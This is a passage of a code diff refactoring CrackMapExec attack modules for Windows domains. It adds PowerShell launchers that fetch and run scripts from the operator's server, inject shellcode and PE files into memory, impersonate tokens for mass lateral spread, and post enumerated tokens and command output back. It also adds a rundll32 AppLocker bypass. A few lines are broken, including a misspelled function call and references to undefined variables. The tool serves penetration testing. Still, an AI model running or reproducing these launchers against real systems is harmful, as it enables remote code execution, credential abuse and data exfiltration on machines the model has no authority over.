         IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-ReflectivePEInjection.ps1');
         $WebClient = New-Object System.Net.WebClient;
         [Byte[]]$bytes = $WebClient.DownloadData('{server}://{addr}:{port}/{pefile}');
-        Invoke-{func_name} -PEBytes $bytes""".format(server=context.server,
+        Invoke-ReflectivePEInjection -PEBytes $bytes""".format(server=context.server,
                                                      port=context.server_port,
                                                      addr=context.localip,
-                                                     func_name=self.obfs_name,
                                                      pefile=os.path.basename(self.payload_path))
 
         if self.procid:
-            payload += ' -ProcessID {}'.format(self.procid)
+            launcher += ' -ProcessID {}'.format(self.procid)
 
         if self.exeargs:
-            payload += ' -ExeArgs "{}"'.format(self.exeargs)
+            launcher += ' -ExeArgs "{}"'.format(self.exeargs)
 
-        context.log.debug('Payload:{}'.format(payload))
+        return create_ps_command(launcher, force_ps32=True)
-        payload = create_ps_command(payload, force_ps32=True)
-        connection.execute(payload)
-        context.log.success('Executed payload')
 
-    def on_request(self, context, request):
+    def payload(self, context, command):
+        with open(get_ps_script('PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1'), 'r') as ps_script:
+            return obfs_ps_script(ps_script.read())
+
+    def on_admin_login(self, context, connection, launcher, payload):
+        connection.execute(launcher)
+        context.log.success('Executed launcher')
+
+    def on_request(self, context, request, launcher, payload):
         if 'Invoke-ReflectivePEInjection.ps1' == request.path[1:]:
             request.send_response(200)
             request.end_headers()
 
-            with open(get_ps_script('PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1'), 'r') as ps_script:
+
-                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
+            request.wfile.write(launcher)
-                request.wfile.write(ps_script)
 
         elif os.path.basename(self.payload_path) == request.path[1:]:
             request.send_response(200)

cme/modules/powerview.py

@@ -13,24 +13,39 @@ class CMEModule:
 
     description = "Wrapper for PowerView's functions"
 
+    chain_support = False
+
     def options(self, context, module_options):
         '''
-            COMMAND  Powerview command to run
+            COMMAND  Command to execute on the target system(s) (Required if CMDFILE isn't specified)
+            CMDFILE  File contaning the command to execute on the target system(s) (Required if CMD isn't specified)
         '''
 
-        self.command = None
+        if not 'COMMAND' in module_options and not 'CMDFILE' in module_options:
-        if not 'COMMAND' in module_options:
+            context.log.error('COMMAND or CMDFILE options are required!')
-            context.log.error('COMMAND option is required!')
+            exit(1)
+
+        if 'COMMAND' in module_options and 'CMDFILE' in module_options:
+            context.log.error('COMMAND and CMDFILE are mutually exclusive!')
             exit(1)
 
         if 'COMMAND' in module_options:
             self.command = module_options['COMMAND']
 
-    def on_admin_login(self, context, connection):
+        elif 'CMDFILE' in module_options:
+            path = os.path.expanduser(module_options['CMDFILE'])
 
-        powah_command = self.command + ' | Out-String'
+            if not os.path.exists(path):
+                context.log.error('Path to CMDFILE invalid!')
+                exit(1)
 
-        payload = '''
+            with open(path, 'r') as cmdfile:
+                self.command = cmdfile.read().strip()
+
+    def launcher(self, context, command):
+        powah_command = command + ' | Out-String'
+
+        launcher = '''
         IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/PowerView.ps1');
         $data = {command}
         $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
@@ -46,18 +61,21 @@ class CMEModule:
                                           addr=context.localip,
                                           command=powah_command)
 
-        context.log.debug('Payload: {}'.format(payload))
+        return create_ps_command(launcher)
-        payload = create_ps_command(payload)
+
-        connection.execute(payload, methods=['atexec', 'smbexec'])
+    def payload(self, context, command):
-        context.log.success('Executed payload')
+        with open(get_ps_script('PowerSploit/Recon/PowerView.ps1'), 'r') as ps_script:
+            return obfs_ps_script(ps_script.read())
+
+    def on_admin_login(self, context, connection, launcher, payload):
+        connection.execute(launcher, methods=['atexec', 'smbexec'])
+        context.log.success('Executed launcher')
 
     def on_request(self, context, request):
         if 'PowerView.ps1' == request.path[1:]:
             request.send_response(200)
             request.end_headers()
 
-            with open(get_ps_script('PowerSploit/Recon/PowerView.ps1'), 'r') as ps_script:
-                ps_script = obfs_ps_script(ps_script.read())
             request.wfile.write(ps_script)
 
         else:

cme/modules/rundll32_exec.py

@@ -0,0 +1,51 @@
+class CMEModule:
+    '''
+        AppLocker bypass using rundll32 and Windows native javascript interpreter
+        Module by @byt3bl33d3r
+
+    '''
+
+    name = 'rundll32_exec'
+
+    description = 'Executes a command using rundll32 and Windows\'s native javascript interpreter'
+
+    #If the module supports chaining, change this to True
+    chain_support = True
+
+    def options(self, context, module_options):
+        '''
+            COMMAND  Command to execute on the target system(s) (Required if CMDFILE isn't specified)
+            CMDFILE  File contaning the command to execute on the target system(s) (Required if CMD isn't specified)
+        '''
+
+        if not 'COMMAND' in module_options and not 'CMDFILE' in module_options:
+            context.log.error('COMMAND or CMDFILE options are required!')
+            exit(1)
+
+        if 'COMMAND' in module_options and 'CMDFILE' in module_options:
+            context.log.error('COMMAND and CMDFILE are mutually exclusive!')
+            exit(1)
+
+        if 'COMMAND' in module_options:
+            self.command = module_options['COMMAND']
+
+        elif 'CMDFILE' in module_options:
+            path = os.path.expanduser(module_options['CMDFILE'])
+
+            if not os.path.exists(path):
+                context.log.error('Path to CMDFILE invalid!')
+                exit(1)
+
+            with open(path, 'r') as cmdfile:
+                self.command = cmdfile.read().strip()
+
+    def launcher(self, context, command):
+        launcher = 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("{}");'.format(command)
+        return launcher
+
+    def payload(self, context, command):
+        return
+
+    def on_admin_login(self, context, connection, launcher, payload):
+        connection.execute(launcher)
+        context.log.success('Executed command')

cme/modules/shellcode_inject.py

@@ -1,16 +1,18 @@
-import os
+from cme.helpers import create_ps_command, obfs_ps_script, get_ps_script
-from cme.helpers import gen_random_string, create_ps_command, obfs_ps_script, get_ps_script
 from sys import exit
+import os
 
 class CMEModule:
     '''
         Downloads the specified raw shellcode and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script
         Module by @byt3bl33d3r
     '''
-    name = 'shellinject'
+    name = 'shellcode_inject'
 
     description = "Downloads the specified raw shellcode and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script"
 
+    chain_support = False
+
     def options(self, context, module_options):
         '''
             PATH     Path to the raw shellcode to inject
@@ -31,36 +33,35 @@ class CMEModule:
         if 'PROCID' in module_options.keys():
             self.procid = module_options['PROCID']
 
-        self.obfs_name = gen_random_string()
+    def launcher(self, context, command):
-
+        launcher = """
-    def on_admin_login(self, context, connection):
-
-        payload = """
         IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-Shellcode.ps1');
         $WebClient = New-Object System.Net.WebClient;
         [Byte[]]$bytes = $WebClient.DownloadData('{server}://{addr}:{port}/{shellcode}');
-        Invoke-{func_name} -Force -Shellcode $bytes""".format(server=context.server,
+        Invoke-Shellcode -Force -Shellcode $bytes""".format(server=context.server,
                                                               port=context.server_port,
                                                               addr=context.localip,
-                                                              func_name=self.obfs_name,
                                                               shellcode=os.path.basename(self.shellcode_path))
 
         if self.procid:
-            payload += ' -ProcessID {}'.format(self.procid)
+            launcher += ' -ProcessID {}'.format(self.procid)
 
-        context.log.debug('Payload:{}'.format(payload))
+        return create_ps_command(launcher, force_ps32=True)
-        payload = create_ps_command(payload, force_ps32=True)
-        connection.execute(payload)
-        context.log.success('Executed payload')
 
-    def on_request(self, context, request):
+    def payload(self, context, command):
+        with open(get_ps_script('Powersploit/CodeExecution/Invoke-Shellcode.ps1') ,'r') as ps_script:
+            return obfs_ps_script(ps_script.read())
+
+    def on_admin_login(self, context, connection, launcher, payload):
+        connection.execute(launcher)
+        context.log.success('Executed launcher')
+
+    def on_request(self, context, request, launcher, payload):
         if 'Invoke-Shellcode.ps1' == request.path[1:]:
             request.send_response(200)
             request.end_headers()
 
-            with open(get_ps_script('Powersploit/CodeExecution/Invoke-Shellcode.ps1') ,'r') as ps_script:
+            request.wfile.write(payload)
-                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
-                request.wfile.write(ps_script)
 
         elif os.path.basename(self.shellcode_path) == request.path[1:]:
             request.send_response(200)

cme/modules/token_rider.py

@@ -1,5 +1,5 @@
 from StringIO import StringIO
-from cme.helpers import create_ps_command, gen_random_string, obfs_ps_script, get_ps_script
+from cme.helpers import create_ps_command, obfs_ps_script, get_ps_script
 from base64 import b64encode
 import sys
 import os
@@ -16,16 +16,18 @@ class CMEModule:
         Module by @byt3bl33d3r
     '''
 
-    name = 'tokenrider'
+    name = 'token_rider'
 
     description = 'Allows for automatic token enumeration, impersonation and mass lateral spread using privileges instead of dumped credentials'
 
+    chain_support = True
+
     def options(self, context, module_options):
         '''
             TARGET   Target machine(s) to execute the command on (comma seperated)
             USER     User to impersonate
             DOMAIN   Domain of the user to impersonate
-            CMD      Command to execute on the target system(s) (Required if CMDFILE isn't specified)
+            COMMAND  Command to execute on the target system(s) (Required if CMDFILE isn't specified)
             CMDFILE  File contaning the command to execute on the target system(s) (Required if CMD isn't specified)
         '''
 
@@ -33,20 +35,21 @@ class CMEModule:
             context.log.error('TARGET, USER and DOMAIN options are required!')
             sys.exit(1)
 
-        if not 'CMD' in module_options and not 'CMDFILE' in module_options:
+        if not 'COMMAND' in module_options and not 'CMDFILE' in module_options:
-            context.log.error('CMD or CMDFILE options are required!')
+            context.log.error('COMMAND or CMDFILE options are required!')
             sys.exit(1)
 
-        if 'CMD' in module_options and 'CMDFILE' in module_options:
+        if 'COMMAND' in module_options and 'CMDFILE' in module_options:
-            context.log.error('CMD and CMDFILE are mutually exclusive!')
+            context.log.error('COMMAND and CMDFILE are mutually exclusive!')
             sys.exit(1)
 
         self.target_computers = ''
         self.target_user = module_options['USER']
         self.target_domain = module_options['DOMAIN']
 
-        if 'CMD' in module_options:
+        if 'COMMAND' in module_options:
-            self.command = module_options['CMD']
+            self.command = module_options['COMMAND']
+
         elif 'CMDFILE' in module_options:
             path = os.path.expanduser(module_options['CMDFILE'])
 
@@ -62,12 +65,9 @@ class CMEModule:
             self.target_computers += '"{}",'.format(target)
         self.target_computers = self.target_computers[:-1]
 
-        self.obfs_name = gen_random_string()
-
         #context.log.debug('Target system string: {}'.format(self.target_computers))
 
-    def on_admin_login(self, context, connection):
+    def launcher(self, context, command):
-
         second_stage = '''
         [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
         IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/TokenRider.ps1');'''.format(server=context.server, 
@@ -75,8 +75,8 @@ class CMEModule:
                                                                                                             port=context.server_port)
         context.log.debug(second_stage)
 
-        #Main payload
+        #Main launcher
-        payload = '''
+        launcher = '''
         function Send-POSTRequest {{
             [CmdletBinding()]
             Param (
@@ -94,7 +94,7 @@ class CMEModule:
         }}
 
         IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-TokenManipulation.ps1');
-        $tokens = Invoke-{obfs_func} -Enum;
+        $tokens = Invoke-TokenManipulation -Enum;
         foreach ($token in $tokens){{
             if ($token.Domain -eq "{domain}" -and $token.Username -eq "{user}"){{
 
@@ -103,43 +103,26 @@ class CMEModule:
                 $post_back = $post_back + $token_desc;
                 Send-POSTRequest $post_back
 
-                Invoke-{obfs_func} -Username "{domain}\\{user}" -CreateProcess "cmd.exe" -ProcessArgs "/c powershell.exe -exec bypass -window hidden -noni -nop -encoded {command}";
+                Invoke-TokenManipulation -Username "{domain}\\{user}" -CreateProcess "cmd.exe" -ProcessArgs "/c powershell.exe -exec bypass -window hidden -noni -nop -encoded {command}";
                 return
             }}
         }}
 
-        Send-POSTRequest "User token not present on system!"'''.format(obfs_func=self.obfs_name,
+        Send-POSTRequest "User token not present on system!"'''.format(command=b64encode(second_stage.encode('UTF-16LE')),
-                                                                       command=b64encode(second_stage.encode('UTF-16LE')),
                                                                        server=context.server,
                                                                        addr=context.localip,
                                                                        port=context.server_port,
                                                                        user=self.target_user,
                                                                        domain=self.target_domain)
 
-        context.log.debug(payload)
+        return create_ps_command(launcher)
-        payload = create_ps_command(payload)
-        connection.execute(payload, methods=['atexec', 'smbexec'])
-        context.log.success('Executed payload')
 
-    def on_request(self, context, request):
+    def payload(self, context, command):
-        if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
+        command_to_execute  = 'cmd.exe /c {}'.format(command)
-            request.send_response(200)
-            request.end_headers()
-
-            with open(get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script:
-                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
-                request.wfile.write(ps_script)
-
-        elif 'TokenRider.ps1' == request.path[1:]:
-            request.send_response(200)
-            request.end_headers()
-
-            #Command to execute on the target system(s)
-            command_to_execute  = 'cmd.exe /c {}'.format(self.command)
         #context.log.debug(command_to_execute)
 
         #This will get executed in the process that was created with the impersonated token
-            elevated_ps_command = '''
+        payload = '''
         [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
         function Send-POSTRequest {{
             [CmdletBinding()]
@@ -173,7 +156,27 @@ class CMEModule:
                                                 targets=self.target_computers,
                                                 command=command_to_execute)
 
-            request.wfile.write(elevated_ps_command)
+        return payload
+
+    def on_admin_login(self, context, connection, launcher, payload):
+        connection.execute(launcher, methods=['atexec', 'smbexec'])
+        context.log.success('Executed launcher')
+
+    def on_request(self, context, request, launcher, payload):
+        if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
+            request.send_response(200)
+            request.end_headers()
+
+            with open(get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script:
+                ps_script = obfs_ps_script(ps_script.read())
+                request.wfile.write(ps_script)
+
+        elif 'TokenRider.ps1' == request.path[1:]:
+            request.send_response(200)
+            request.end_headers()
+
+            #Command to execute on the target system(s)
+            request.wfile.write(payload)
 
         else:
             request.send_response(404)

cme/modules/tokens.py

@@ -1,4 +1,4 @@
-from cme.helpers import create_ps_command, obfs_ps_script, gen_random_string, get_ps_script, write_log
+from cme.helpers import create_ps_command, obfs_ps_script, get_ps_script, write_log
 from datetime import datetime
 from StringIO import StringIO
 import os
@@ -14,6 +14,8 @@ class CMEModule:
 
     description = "Enumerates available tokens using Powersploit's Invoke-TokenManipulation"
 
+    chain_support = False
+
     def options(self, context, module_options):
         '''
             USER      Search for the specified username in available tokens (default: None)
@@ -39,13 +41,10 @@ class CMEModule:
 
             self.userfile = path
 
-        self.obfs_name = gen_random_string()
+    def launcher(self, context, command):
-
+        launcher = '''
-    def on_admin_login(self, context, connection):
-
-        payload = '''
         IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-TokenManipulation.ps1');
-        $creds = Invoke-{func_name} -Enumerate | Select-Object Domain, Username, ProcessId, IsElevated | Out-String;
+        $creds = Invoke-TokenManipulation -Enumerate | Select-Object Domain, Username, ProcessId, IsElevated | Out-String;
         $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
         $request.Method = 'POST';
         $request.ContentType = 'application/x-www-form-urlencoded';
@@ -56,22 +55,24 @@ class CMEModule:
         $requestStream.Close();
         $request.GetResponse();'''.format(server=context.server, 
                                           port=context.server_port, 
-                                          addr=context.localip,
+                                          addr=context.localip)
-                                          func_name=self.obfs_name)
 
-        context.log.debug('Payload: {}'.format(payload))
+        return reate_ps_command(launcher)
-        payload = create_ps_command(payload)
-        connection.execute(payload)
-        context.log.success('Executed payload')
 
-    def on_request(self, context, request):
+    def payload(self, context, command):
+        with open(get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script:
+            return obfs_ps_script(ps_script.read())
+
+    def on_admin_login(self, context, connection, launcher, payload):
+        connection.execute(launcher)
+        context.log.success('Executed launcher')
+
+    def on_request(self, context, request, launcher, payload):
         if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
             request.send_response(200)
             request.end_headers()
 
-            with open(get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script:
+            request.wfile.write(payload)
-                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
-                request.wfile.write(ps_script)
 
         else:
             request.send_response(404)

setup.py

@@ -3,6 +3,7 @@ from setuptools import setup, find_packages
 setup(name='crackmapexec',
     version='3.1.5-dev',
     description='A swiss army knife for pentesting Windows/Active Directory environments',
+    dependency_links = ['https://github.com/CoreSecurity/impacket/tarball/master#egg=impacket-0.9.16dev'],
     classifiers=[
         'License :: OSI Approved :: BSD License',
         'Programming Language :: Python :: 2.7',
@@ -16,7 +17,7 @@ setup(name='crackmapexec',
         "cme", "cme.*"
     ]),
     install_requires=[
-        'impacket>=0.9.15',
+        'impacket>=0.9.16dev',
         'gevent',
         'netaddr',
         'pyOpenSSL',